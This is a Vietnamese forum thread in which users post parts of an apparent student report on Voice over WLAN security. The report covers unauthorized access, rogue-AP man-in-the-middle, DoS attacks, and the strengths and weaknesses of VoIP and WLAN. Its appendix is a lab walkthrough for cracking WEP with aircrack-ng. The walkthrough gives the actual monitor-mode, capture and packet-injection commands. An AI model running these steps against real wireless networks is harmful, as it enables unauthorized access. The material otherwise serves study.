Announcement

**duongiph** · 30-10-2009, 10:50 AM

rất mong sự giúp đỡ của các bạn. Mình đang làm đồ án môn "truyền thông mạng". Mình muốn xin các bạn tài liệu về VoWLan. Gmail: duongiph@gmail.com .Xin chân thành cảm ơn

**uyenminh** · 31-10-2009, 10:40 AM

2.2.2. Truy cập trái phép

Truy cập trái phép (unauthorized access) là kiểu tấn công vào quá trình xác thực có tính chủ động. Bằng biện pháp nào đó, kẻ tấn công có được thông tin cần thiết cho quá trình xác thực và trao đổi thông tin của client hay AP hợp pháp. Sau đó sẽ sử dụng những thông tin này để giả danh client hay AP thâm nhập hợp pháp vào mạng.

Biện pháp lọc địa chỉ MAC đôi khi được sử dụng để điều khiển truy nhập mạng. Tuy nhiên nó không được xem như một phương thức bảo mật. Bởi vì kẻ tấn công chỉ cần sử dụng một chương trình nắm bắt gói tin thông thường như NetStumbler cũng có thể biết được địa chỉ MAC hợp pháp sau đó dùng một chương trình khác để giả mạo địa chỉ MAC này, ví dụ như SMAC chẳng hạn. Như vậy kẻ tấn công đã có thể dễ dàng vượt qua biện pháp điều khiển truy nhập này.

Một trong những cách thức tấn công khá phổ biến kiểu truy cập trái phép là tấn công Brute-Force. Kẻ tấn công sử dụng biện pháp thử-sai, xét tất cả các khả năng có thể có của mật khẩu để thử, cho đến khi tìm được mật khẩu chính xác thì thôi. Biện pháp tấn công này có nhiều nhược điểm như đòi hỏi năng lực xử lý của thiết bị phải cao, thời gian tìm ra mật khẩu phụ thuộc vào độ dài và sự phức tạp của mật khẩu.

Hiện nay, với việc sử dụng WPA/WPA2, quá trình xác thực được thực hiện theo cả hai chiều và thông tin dữ liệu trao đổi được bảo đảm an toàn hơn rất nhiều. Cơ chế mã hóa TKIP/RC4 có khả năng chống đỡ rất cao trước các hình thức tấn công mạng. Cho dù kẻ tấn công bằng biện pháp nào đó có thể giả mạo địa chỉ MAC, nắm bắt các gói tin, song thông tin có ích thật sự lại không thể tìm ra được.

Một nguy cơ rất lớn đối với VoWLAN đó chính là việc bị chiếm dụng tài nguyên mạng. Hiện nay có ba phương pháp được sử dụng để đảm bảo tính hợp pháp của thiết bị đầu cuối VoWLAN đó chính là dựa vào địa chỉ MAC, khóa bảo mật và chứng thực số. Tuy nhiên, như chúng ta đã biết địa chỉ MAC có thể bị giả mạo một cách dễ dàng. Trong khi đó khóa bảo mật có thể được sử dụng là WEP hay WPA/WPA2. WEP ngày nay vẫn được sử dụng khá phổ biến do yêu cầu về tính tương thích với thiết bị cũ và thông tin tiêu đề bổ sung của nó nhỏ (cỡ 8 byte so với TKIP là 20 byte). WPA/WPA2 chứng minh được tính bảo mật cao hơn nhiều. Thực tế cho thấy hiện nay chưa có nghiên cứu hay báo cáo nào chỉ ra rằng TKIP/RC4 hay CCMP/AES có thể bị tấn công như đối với WEP. Biện pháp duy nhất để kẻ tấn công lấy được khóa bảo mật đó là bằng con đường social engineering. Cả hai cơ chế bảo mật trên, sử dụng địa chỉ MAC và khóa bảo mật đều không thể đảm bảo tính duy nhất và hợp pháp của thiết bị đầu cuối. Chứng thực số khắc phục được những nhược điểm này. Chứng thực số là số nhận dạng duy nhất đối với từng thiết bị đầu cuối, không thể bị làm giả. Tuy nhiên, nó yêu cầu năng lực xử lý cao của cả đầu cuối client cũng như AP, trong một số trường hợp yêu cầu thêm hệ thống PKI phải được bổ sung vào kiến trúc mạng, tăng thêm độ phức tạp. Việc sử dụng chứng thực số mới chỉ hình thành trên cơ sở lý thuyết. Trên thực tế chưa có một sản phẩm nào mang tính thương mại áp dụng cơ chế này. Hơn thế nữa, do đặc tính di động của đầu cuối VoWLAN, khả năng thiết bị bị mất hay đánh cắp là rất cao.

2.2.3. Tấn công theo kiểu Man-in-the-middle

Tấn công man-in-the-middle là khi kẻ tấn công sử dụng một AP để ánh lừa các node di động kết nối tới AP đó bằng các phát tín hiệu mạnh hơn AP hợp pháp. Quá trình tấn công như sau:

-Kẻ tấn công kích hoạt một AP lên, AP này có thể là máy tính của kẻ tấn công, hoạt động thông qua phần mềm giả lập AP.

-Kẻ tấn công cấu hình AP này có cùng SSID như của mạng WLAN mà nạn nhân đang kết nối tới.

-Sau đó kẻ tấn công sẽ gửi một khung yêu cầu xác thực lại (hoặc tạo ra một nguồn phát tín hiệu lớn gây nhiễu để buộc nạn nhân phải thực hiện kết nối lại), ép nạn nhân tìm kiếm một AP mới để kết nối.

-Bởi vì AP của kẻ tấn công ở gần nạn nhân hơn và tạo ra tín hiệu tốt hơn nên thông thường thiết bị của nạn nhân sẽ chọn kết nối tới AP của kẻ tấn công, trong khi đó nạn nhân vẫn ngỡ mình đang được kết nối tới AP hợp pháp.

Việc kết nối tới AP giả mạo được xem như là một phần của chuyển vùng (roaming) nên người dùng không hề biết được.

Hình 2.7. Tấn công kiểu man-in-the-middle

Kẻ tấn công trước tiên phải sử dụng SSID mà các client đang sử dụng (giá trị này dễ dàng có được), và cũng phải có khóa WEP nếu mạng sử dụng WEP.

Tiếp nữa, kẻ tấn công có thể sử dụng một card mạng thứ hai kết nối với AP hợp pháp, kẻ tấn công sẽ cấu hình cho hai card mạng này hoạt động bridging với nhau. Như vậy, máy của kẻ tấn công chính là người đứng giữa, hoạt động giữa client và AP hợp pháp. Nạn nhân vẫn có thể truy cập Internet hay các dịch vụ khác do AP hợp pháp cung cấp. Trong khi đó, kẻ tấn công có thể thực hiện rất nhiều các hình thức tấn công tới thiết bị của nạn nhân, bao gồm cả hoạt động giám sát thông tin trao đổi.

Với kiểu tấn công này, người dùng rất khó để có thể phát hiện ra. Lượng thông tin mà kẻ tấn công thu thập được phụ thuộc vào thời gian duy trì được trạng thái này. Để chống lại cách tấn công này, cách tốt nhất là sử dụng hệ thống phát hiện xâm nhập (IDS - Intrusion Detection System). Hệ thống này có thể phát hiện ra các dấu hiệu bất thường của mạng và giúp người quản trị xử lý kịp thời.

**uyenminh** · 02-11-2009, 10:33 AM

2.2.4. Tấn công từ chối dịch vụ

Tấn công từ chối dịch vụ DoS có thể chia thành hai loại: DoS lớp vật lý và DoS lớp liên kết dữ liệu.

Tấn công DoS lớp vật lý được thực hiện bằng cách gây nhiễu tín hiệu vô tuyến. Kẻ tấn công có thể sử dụng một thiết bị phát tín hiệu vô tuyến hoạt động trong dải băng tần mà mạng WLAN mục tiêu sử dụng, phát ra tín hiệu với công suất lớn hơn rất nhiều và ở khoảng cách gần AP mục tiêu. Từ đó sẽ gây ra nhiễu vô tuyến, làm cho chất lượng tín hiệu suy giảm rõ rệt, trong trường hợp xấu nhất sẽ làm mất hoàn toàn tín hiệu. Đôi khi trong thực tế cũng có những thiết bị gây nhiễu không nhằm mục đích xấu như lò vi sóng, điện thoại không dây hay các mạng WLAN lân cận hoạt động trong băng tần mà mạng WLAN sử dụng. Tuy nhiên, biện pháp tấn công từ chối dịch vụ DoS lớp vật lý thường không được sử dụng phổ biến do chi phí mua thiết bị gây nhiễu tương đối cao và không tiện dụng, trong khi vẫn có những cách tấn công DoS khác khá hiệu quả, điển hình như tấn công DoS lớp liên kết dữ liệu!

Hình 2.8. Tấn công DoS lớp Vật lý

Tấn công DoS lớp Liên kết dữ liệu được thực hiện bằng nhiều cách, như: phát tràn ngập các khung hủy xác thực hay hủy kết hợp, các khung dữ liệu rỗng, vv… Khi kẻ tấn công phát liên tiếp các khung hủy xác thực và hủy kết hợp, sử dụng địa chỉ MAC giả mạo của AP hợp pháp, thiết bị thu phát tín hiệu của nạn nhân sẽ không thể kêt nối đến AP để gia nhập vào mạng WLAN. Biện pháp tấn công này có hiệu quả cao hơn so với việc sử dụng các khung dữ liệu rỗng. Khi sử dụng phát liên tiếp nhiều khung dữ liệu rỗng trên nhiều card mạng không dây, mục đích của kẻ tấn công là nhằm chiếm dụng băng thông kết nối. Biện pháp này hiệu quả đạt được tỉ lệ thuận với khoảng cách đến thiết bị nạn nhân hoặc AP, công suất phát và số lượng card mạng được sử dụng.

Hình 2.9. Tấn công DoS lớp Liên kết dữ liệu

Một biến thể khác của tấn công từ chối dịch vụ DoS lớp 3 là DDoS. Theo đó, kẻ tấn công sẽ tìm cách xâm nhập và cài đặt các mã độc hại lên nhiều thiết bị trong toàn mạng WLAN bằng con đường phát tán thư rác, dụ dỗ nạn nhân kích vào đường link chứa mã độc hại. Một khi thiết bị nào đó khi đã bị dính mã độc hại này, nó sẽ kích hoạt một chương trình thoại qua VoIP như Yahoo!Messenger hay Skype để tạo ra lưu lượng thoại nhằm mục đích chiếm dụng tài nguyên mạng. Bản thân thiết bị này sau đó cũng có thể trở thành nguồn lây nhiễm thứ cấp cho công việc phát tán mã độc hại. DDoS có sức phá hoại cao hơn DoS nhiều lần.

Triệu chứng dễ nhận thấy nhất khi bị tấn công DoS là sự suy giảm tín hiệu một cách rõ rệt và bất thường. Để khắc phục kiểu tấn công này, có thể sử dụng các thiết bị phân tích phổ tín hiệu nhằm phát hiện ra vị trí các phần tử gây nhiễu sau đó di dời chúng đi nơi khác. Hoặc có thể dùng phương pháp quản trị như chia VLAN, thiết lập Policy. Chia VLAN dựa trên đặc tính của ứng dụng, có thể thiết lập từng VLAN dành riêng cho các kiểu lưu lượng khác nhau như VLAN thoại, VLAN dữ liệu,… Thiết lập Policy cho từng nhóm đối tượng với các quyền hạn truy nhập khác nhau, mức độ ưu tiên chiếm dụng tài nguyên khác nhau.

Kết luận chương 2

Tương tự như WLAN, hệ thống VoWLAN cũng có nhiều nguy cơ bị tấn công. Tuy nhiên, khác với WLAN, việc bảo mật trong hệ thống VoWLAN cần phải được tính toán cân đối giữa hai yếu tố an toàn và tốc độ, bởi vì mạng càng được tăng cường bảo mật thì độ trễ của mạng càng tăng cao, ảnh hưởng đến đường thoại trong mạng.

**uyenminh** · 03-11-2009, 10:07 AM

Chương 3: KẾT LUẬN VỀ CÔNG NGHỆ VOWLAN

3.1. Ưu nhược điểm của công nghệ VoWLAN

Công nghệ VoWLAN ra đời đã là sự kết hợp một cách hài hòa giữa WLAN và VoIP. Cũng chính vì lẽ đó, bên cạnh việc hội tụ những ưu điểm của cả hai công nghệ kể trên nó còn hứng chịu tác động bất lợi cũng chính từ hai công nghệ này mang lại.

3.1.1. Ưu điểm

3.1.1.1. Ưu điểm kế thừa từ công nghệ VoIP

Điện thoại IP ra đời nhằm khai thác tính hiệu quả của các mạng truyền số liệu và tính linh hoạt trong việc phát triển các ứng dụng mới của giao thức IP và làm cho khả năng các dịch vụ được cung cấp trên một mạng thống nhất toàn cầu trở thành hiện thực. VoIP có các ưu điểm chính so với thoại truyền thống như sau:

-Giảm cước dịch vụ điện thoại đường dài.

-Cho phép thực hiện nhiều cuộc gọi hơn, giảm độ rộng băng thông cho mỗi kết nối.

-Hỗ trợ thêm nhiều dịch vụ bổ sung khác và giúp triển khai các dịch vụ mới nhanh chóng, dễ dàng và tự động.

-Sử dụng hiệu quả nhất những ưu thế của giao thức IP là tính mềm dẻo và dễ dàng tương thích.

Ưu điểm nổi bật của dịch vụ VoIP đối với khách hàng là giá cước rẻ hơn nhiều so với thoại truyền thống do các cuộc gọi VoIP sử dụng lượng băng thông rất ít. Trong khi thoại truyền thống sử dụng kỹ thuật số hóa PCM theo chuẩn G.711 với lượng băng thông cố định cho một kênh thoại là 64 kbps thì VoIP sử dụng kiểu mã hóa nguồn như CS-CELP theo chuẩn G.729 yêu cầu tốc độ 8 kbps, hay G.723 chỉ yêu cầu 5.3/6.3 kbps. Như vậy, rõ ràng là lượng băng thông sử dụng đã giảm được một cách đáng kể.

Ngoài ra, do VoIP sử dụng cơ chế triệt khoảng lặng nên có thể tiết kiệm thêm lượng băng thông này để truyền các dạng thông tin khác. Đó là một ưu điểm lớn của VoIP so với điện thoại chuyển mạch kênh truyền thống. Thông thường, băng thông truyền dẫn cần thiết cho một cuộc gọi PSTN có thể sử dụng cho 4 đến 6, thậm chí 8 cuộc gọi VoIP.

Nếu để ý chi phí cho cuộc gọi theo từng phút ta sẽ thấy lượng tiền tiết kiệm được quả là không nhỏ. Tuy nhiên, việc tiết kiệm chi phí còn tùy thuộc vào vùng địa lý và khoảng cách. Đối với các cuộc gọi nội hạt thì việc tiết kiệm này có vẻ không quan trọng, nhưng đối với các cuộc gọi đường dài, nhất là cuộc gọi quốc tế thì nó thật sự là đáng kể. Điều này được thể hiện ở giá cước mà các nhà cung cấp dịch vụ đưa ra, thông thường giảm còn 1/10 đối với các cuộc gọi quốc tế.

Ưu điểm tiếp theo là khả năng quản lý băng thông. Trong mạng điện thoại sử dụng công nghệ chuyển mạch kênh, tài nguyên băng thông cung cấp cho một cuộc gọi là cố định. Trong mạng IP tài nguyên cung cấp cho một cuộc gọi mềm dẻo và linh hoạt hơn nhiều. Khi người sử dụng cần tài nguyên để thực hiện một cuộc gọi, nếu lưu lượng của mạng thấp, băng thông dành cho cuộc gọi sẽ cho chất lượng tốt nhất. Vào thời gian cao điểm, mạng sẽ hạn chế băng thông của từng cuộc gọi ở mức chấp nhận được nhằm phục vụ cùng lúc nhiều người nhất.

Ưu điểm nữa của VoIP là khả năng dễ dàng kết hợp các loại dịch vụ thoại, dữ liệu và video. Thoại và fax chỉ là các ứng dụng khởi đầu cho VoIP, các ứng dụng mong đợi trong tương lai là đa phương tiện và đa dịch vụ. Trong khi tiến hành đàm thoại, người sử dụng có thể vừa nói chuyện vừa sử dụng các dịch vụ khác như truyền file, chia sẻ dữ liệu hay xem hình ảnh của người bên kia.

Mạng Internet đang bùng nổ trên toàn thế giới và ngày càng có nhiều ứng dụng được phát triển trên nền giao thức IP. Việc triển khai VoIP không đòi hỏi nâng cấp cơ sở hạ tầng mạng một cách phức tạp, các thiết bị bổ sung tương đối rẻ và việc cài đặt, bảo dưỡng cũng đơn giản. Đa số các hãng viễn thông lớn trên thế giới như Cisco, Juniper, Alcatel, Siemens, … đều đã cung cấp các giải pháp cả phần cứng và phần mềm hỗ trợ cho VoIP. Các giải pháp này có thể tương thích với hầu hết các chuẩn giao thức hiện nay.

3.1.1.2. Ưu điểm kế thừa từ công nghệ WLAN

Nếu như công nghệ VoIP nói chung giúp cho VoWLAN giải quyết các vấn đề về băng thông và chi phí đầu tư thì công nghệ WLAN lại giải quyết vấn đề về khả năng di động và roaming, một trong những yêu cầu vô cùng quan trọng đối với khách hàng.

Ưu điểm đầu tiên phải kể đến của công nghệ WLAN đó chính là tính năng di động cung cấp cho các thiết bị đầu cuối. Người sử dụng có thể dùng laptop có cài phần mềm hỗ trợ tính năng thiết lập cuộc gọi, ví dụ như Skype chẳng hạn, hay một điện thoại di động cầm tay hoạt động được trong dải tần của sóng wifi. Hiện nay trên thị trường đã xuất hiện rất nhiều mẫu điện thoại hoạt động tốt ở cả hai chế độ (wifi và mạng thông tin di động), hay điện thoại một chế độ wifi. Tất cả các sản phẩm này nhìn chung đều thân thiện với người sử dụng.

Một trong những điểm nổi trội của công nghệ VoWLAN so với VoIP thông thường đó chính là khả năng roaming. Thiết bị đầu cuối ngay cả khi đang trong quá trình đàm thoại vẫn không bị gián đoạn kết nối khi di chuyển từ vung che phủ sóng wifi của AP này sang AP khác. Tuy nhiên, kỹ thuật roaming hiện nay vẫn chưa được chuẩn hóa mang tính quốc tế, các nhà sản xuất tự xây dựng cho mình cách thức để hỗ trợ roaming riêng, do đó, để đảm bảo tính năng này có thể hoạt động tốt thì yêu cầu sử dụng các AP của cùng một nhà sản xuất là rất cần thiết, trong khi chờ đợi chuẩn 802.11r được IEEE thông qua.

Thuận lợi nữa là, thậm chí có nhiều thiết bị cho phép chúng ta thực hiện các cuộc gọi qua Wi-Fi hay mạng di động, với điện thoại có khả năng chuyển từ kết nối này sang kết nối khác một cách nhanh chóng. (Những điện thoại này được gọi là thiết bị FMC – Fixed-Mobile Converenge - Công nghệ mạng hội tụ di động và cố định.) Điều đó có nghĩa là chúng ta có thể bắt đầu một cuộc gọi di động sau đó chuyển tiếp sang mạng wifi mà không bị ngắt kết nối, ngay cả khi trong vùng che phủ của sóng wifi không tồn tại tín hiệu sóng di động.

Đối với các doanh nghiệp lớn, việc sử dụng điện thoại có chức năng VoWLAN chứng tỏ được rất nhiều ưu thế. Đầu tiên đó chính là việc tận dụng được cơ sở hạ tầng mạng máy tính sẵn có, giảm thiểu chi phí đầu tư, tăng cường tính linh hoạt. Việc roaming trong những mô hình mạng cơ lớn như vậy được thực hiện tương đối dễ dàng do quá trình thiết kế mạng đồng bộ và chuyên nghiệp.

Một ưu điểm cuối cùng là thiết bị đầu cuối VoWLAN tương đối nhỏ gọn so với điện thoại để bàn (bao gồm cả công nghệ PSTN và VoIP) hay đơn giản hơn nó có thể chỉ là một phần mềm ứng dụng được tích hợp trên laptop. Kích thước tương đương một máy điện thoại di động thông thường, có khả năng kết nối wifi phục vụ cho nhu cầu thoại và truyền dữ liệu, đó chính là ưu điểm dễ nhận thấy nhất đối với một chiếc điện thoại VoWLAN.

**uyenminh** · 04-11-2009, 09:08 AM

3.1.2. Nhược điểm

3.1.2.1. Các nhược điểm xuất phát từ công nghệ VoIP

Bên cạnh các ưu điểm, VoIP cũng có những nhược điểm đặc trưng của thoại gói như:

-Giao thức IP là không tin cậy và không hỗ trợ QoS.

-Thời gian trễ truyền lan trên mạng có thể vượt quá giới hạn cho phép làm ảnh hưởng đến chất lượng thoại.

-Độ trễ không đồng nhất giữa các gói tin gây ra hiện tượng jitter.

Nhược điểm cơ bản của VoIP so với thoại truyền thống là chất lượng dịch vụ. Nguyên nhân chính gây ra hạn chế về chất lượng dịch vụ là do mạng IP hoạt động theo nguyên tắc nỗ lực tối đa và không tin cậy, tức là nó không đảm bảo chất lượng dịch vụ cho các ứng dụng. Mức độ phức tạp của mạng cũng như chất lượng các kết nối mạng cũng là yếu tố làm giảm chất lượng dịch vụ.

Một yếu tố nữa cũng ảnh hưởng tới chất lượng dịch vụ VoIP là do nó phải chia đường truyền cùng lúc với nhiều dịch vụ khác nhau trên mạng mà không có một đặc trưng riêng biệt nào để các bộ định tuyến có thể nhận biết và xử lý ưu tiên hơn. Tuy trong phần tiêu đề của gói tin IP cũng có các trường để chỉ mức độ ưu tiên, các yêu cầu về độ trễ, số lượng, độ an toàn nhưng do vẫn còn có sự không thống nhất giữa các nhà cung cấp dịch vụ về một số vấn đề nên IP hỗ trợ mức ưu tiên không đồng nhất và không có giao thức định tuyến tham số dịch vụ.

Cũng như các giao thức truyền số liệu khác, thiết kế ban đầu của giao thức IP không phải để truyền các thông tin thời gian thực. Việc truyền tín hiệu thời gian thực trên mạng chuyển mạch gói một cách liên tục với tốc độ không đổi là rất khó thực hiện do các hiện tượng như mất gói hay độ trễ không ổn định. Kỹ thuật truyền lại các gói bị mất hay bị lỗi là không có ý nghĩa đối với các dịch vụ thời gian thực.

Tất cả các ISP đều cố gắng tối thiểu hóa thời gian truyền gói theo khả năng của mình mà không quan tâm đến năng lực của các ISP khác. Vì vậy, nếu các điểm cuối của cuộc gọi VoIP được phục vụ bởi các ISP khác nhau thì rất có thể xảy ra hiện tượng trễ chiều đi và chiều về là khác nhau, hay không đối xứng. Ngoài ra, cơ chế định tuyến của IP có thể gây ra các vòng định tuyến dẫn đến thời gian trễ quá lớn đối với một cuộc gọi thoại, và gói tin mặc dù đến nơi nhưng cũng không còn ý nghĩa nữa.

Để cho chất lượng dịch vụ chấp nhận được, cần phải có một kỹ thuật nén tín hiệu với tỉ số nén lớn, khả năng tái tạo các gói bị thất lạc, và cơ chế bộ đệm nhận các gói ở phía thu để giải quyết vấn đề trễ nối tiếp của các gói trong quá trình truyền lan. Tốc độ xử lý của các bộ mã hóa/giải mã phải nhanh để cuộc gọi không bị gián đoạn. Đồng thời cơ sở hạ tầng mạng cũng phải được nâng cấp lên các công nghệ mới và phải có cơ chế kiểm soát chất lượng dịch vụ.

3.1.2.2. Nhược điểm từ mạng WLAN mang lại

Nhược điểm đầu tiên và lớn nhất phải kể đến của mạng WLAN chính là khả năng bảo mật. Bởi vì môi trường truyền dẫn mà công nghệ này sử dụng là sóng vô tuyến, không hề bị hạn chế đơn giản về mặt vật lý như các mạng có dây khác. Sóng wifi lan truyền tự do trong không gian, kẻ tấn công chỉ cần một thiết bị đầu cuối với anten có độ hướng tính cao là hoàn toàn có thể thu được tín hiệu mặc dù ở khoảng cách địa lý tương đối xa. Hơn nữa việc sử dụng sóng điện từ làm môi trường truyền dẫn cũng rất dễ bị gây nhiễu bởi các nguồn phát khác bao gồm cả vô tình hay cố ý (tấn công DoS vật lý). Nhìn chung, do đặc thù của mạng wifi nên những hạn chế trên là không thể tránh khỏi, chúng ta chỉ có thể hạn chế đến mức tối đa khả năng gây hại của chúng bằng cách sử dụng các biện pháp như mã hóa dữ liệu, dò tìm và cách ly nguồn gây nhiễu, kết hợp với các quy định về pháp luật do Nhà nước ban hành.

Tiếp theo, đó chính là sự hạn chế về mặt băng thông. Với một AP hoạt động theo chuẩn 802.11b chỉ có khả năng phục vụ tốt cho khoảng 12 cuộc gọi đồng thời, không tính đến sự có mặt của các kết nối dữ liệu.Thực tế, các mô hình mạng WLAN luôn là sự kết hợp của cả truyền dẫn dữ liệu và tín hiệu thoại, do đó việc chia tách VLAN cho ít nhất hai dạng tín hiệu này là vô cùng cần thiết. VLAN thoại cần được cài đặt có mức độ ưu tiên cao hơn so với dữ liệu. Hiện nay, IEEE đang xây dựng chuẩn 802.11n cho phép băng thông có thể lên tới 600 Mbps, dự kiến sẽ được thông qua vào đầu năm 2009.

Thứ ba là khả năng roaming tương đối kém. Các AP chỉ có thể hỗ trợ roaming tốt khi thuộc cùng một nhà sản xuất. Hiện tại vẫn chưa có chuẩn chung nào quy định về vấn đề này, các giải pháp đang được sử dụng đều do các hãng tự thiết kế theo giao thức của riêng mình, khả năng thích ứng lẫn nhau là rất kém. Chuẩn 802.11r vẫn đang được IEEE xây dựng để giải quyết vấn đề này. Cho đến khi 802.11r được thông qua thì biện pháp tốt nhất là sử dụng các sản phẩm một cách đồng bộ, của cùng một nhà sản xuất uy tín trên thị trường.

Khả năng chuyển tiếp cuộc gọi giữa mạng Wifi và các mạng không dây khác như GSM, 3G, WiMAX, … cho dù đã và đang được nghiên cứu rất nhiều xong một giải pháp hoàn toàn ổn định và đáng tin cậy vẫn chưa được đưa ra. Tất cả mới chỉ dừng lại ở mức độ thử nghiệm để tiếp tục phát triển.

Sự ra đời của VoWLAN làm cho việc quản lý mạng viễn thông càng trở nên phức tạp hơn. Việc tính cước cuộc gọi sao cho đúng đắn là cả một vấn đề đầy thách thức và nhạy cảm. Một khi người sử dụng thấy được sự tiện dụng và kinh tế mà VoWLAN mang lại, đồng thời khi chất lượng cuộc gọi được cải thiện hơn nữa, thì nó sẽ gây bất lợi cho các nhà cung cấp dịch vụ di động khác nhờ tính cạnh tranh về giá cước của mình.

Cuối cùng, hiện nay, giá thiết bị đầu cuối VoWLAN vẫn còn quá cao so với những gì mà nó mang lại. Một số nhà cung cấp phần cứng như Cisco, Nokia hay nhà cung cấp dịch vụ như Skype, T-Mobile đã tung ra thị trường nhiều dòng sản phẩm hỗ trợ VoWLAN ở cả chế độ đơn hay đa chế độ.

3.2. Tổng kết

Có thể nói VoWLAN không phải là một công nghệ gì đó mang tính đột phá và hoàn toàn mới mẻ. Nó đơn giản chỉ là sự kết hợp mềm dẻo giữa VoIP và WLAN để mang đến sự tiện dụng và chi phí rẻ cho người sử dụng đầu cuối. Một khi hạ tầng mạng WLAN phát triển đầy đủ và phổ biến thì sự ra đời và lớn mạnh của VoWLAN sẽ như một sự tất yếu. Tất nhiên, người ta sẽ không bao giờ bỏ kinh phí ra đầu tư một mạng WLAN tốt chỉ để nhằm mục đích phục vụ cho việc tận dụng công nghệ thoại qua WLAN. VoWLAN chỉ có thể phát triển được một khi mạng WLAN phát triển.

Bởi vì tín hiệu thoại được truyền đi dưới dạng sóng vô tuyến, do đó, VoWLAN phải đối mặt với rất nhiều những nguy cơ tấn công, bao gồm cả vô tình và có mục đích. Khả năng bị nghe lén cuộc gọi là không thể tránh khỏi. Song, nếu được áp dụng các công nghệ và tuân thủ các tiêu chuẩn nghiêm ngặt của các chuẩn quốc tế như IEEE 802.11i hay WPA/WPA2 của Wifi Allience đưa ra thì sẽ giảm thiểu được hầu hết các nguy cơ tấn công này.

Cũng như mọi công nghệ khác, VoWLAN mang trong mình vô số ưu điểm song cũng không tránh khỏi những nhược điểm. Do đó, tương lai của công nghệ không thể đơn giản dự đoán trước được, nó chỉ có thể đứng vững trong cuộc sống một khi được người sử dụng đánh giá cao và thực sự được chấp nhận.

**uyenminh** · 05-11-2009, 10:56 AM

Phụ lục: BẺ KHÓA WEP SỬ DỤNG BACK TRACK 3

I. Chuẩn bị

1.Access Point cấu hình sẵn WEP key 64 bit.

2.PC có card wireless chipset được chương trình aircrack-ng hỗ trợ, xem chi tiết tại http://www.aircrack-ng.org).

3.Hệ điều hành Back Track 3 Final.

II. Các bước thực hiện

Khởi động vào Back Track 3

Chuẩn bị cho card wifi:

Đầu tiên ta bật Monitor Mode trên card wifi. Các câu lệnh như sau:

#airmon-ng (kiểm tra card mạng)
#modprobe -r iwl3945
#modprobe ipwraw

Tiếp theo ta tắt card wifi, thay đổi địa chỉ MAC, rồi bật card wifi lên lại

Tấn công mục tiêu:

Giờ ta xác định một mạng WEP thích hợp:

# airodump-ng wifi0

Ghi chú lại thông tin MAC address (BSSID), channel (CH) và name (ESSID) của mạng muốn tấn công.

Giờ ta thu thập data từ access point để tấn công: dùng airodump-ng để bắt các gói tin:

#airodump-ng -c 6 -w wep --bssid 00:1A:70:34:6F:CC eth0

-c 6 channel 6
-w wep ghi dữ liệu bắt được vào file có tên wep lưu mặc
định trong thư mục home/ của user.
--bssid 00:1D:7E:B0:47:DE giá trị BSSID của AP mục tiêu

Kết quả hiện ra màn hình như sau:

Giờ ta tạo các gói giả mạo đến access point để nó tăng tốc độ dữ liệu đi ra, ta dùng lệnh sau:

#aireplay-ng -1 0 –a 00:1D:7E:B0:47:DE –h 00:11:22:33:44:55 wifi0

Câu lệnh trên thành công, ta dùng lệnh sau để bơm gói tin vào mạng đích:

#aireplay-ng -3 –b 00:1D:7E:B0:47:DE –h 00:11:22:33:44:55 wifi0

Kết quả sau khi bơm gói tin, số lượng gói dữ liệu bắt được tăng lên nhanh chóng!

Khi đã bắt đủ các gói tin (khoảng trên 16000 gói), ta có thể bắt đầu tìm khóa:

Kết quả:

Như vậy ta đã tìm được WEP key là 0123456789

TÀI LIỆU THAM KHẢO

1.Jim Geier, Deploying Voice over Wireless LANs, Cisco Press, 2007

2.Frank Ohrtman, Voice over 802.11, Artech House, 2004

3.Leif Madsen - Jared Smith - Jim Van Meggelen, The Future of Telephony, O'Reilly, 2005

4.TS Trần Công Hùng, VoIP, Học việc Công nghệ BCVT cơ sở HCM, 2006

5.Planet3 Wireless Inc., The Official CWNA Study Guide, 2002

6.Các website liên quan:

http://www.wifipro.org
http://www.vnpro.org

**pjsoga** · 28-11-2010, 12:34 PM

[QUOTE=phamminhtuan;118010]Install Asterisk:
-Download các gói cần thiết. Trong phần này chỉ thực hiện mô phỏng với softphone nên chỉ cần core asterisk.
Có thể hướng dẫn em cụ thể được không , em không rành lắm về linux .Em đang cần cài đặ tổng đài mềm asterik trên centos với softphone , nếu có video thì tốt quá

Announcement

Bảo mật trong voice over wireless-lan

Comment

Comment

Comment

Comment

Comment

Comment

Comment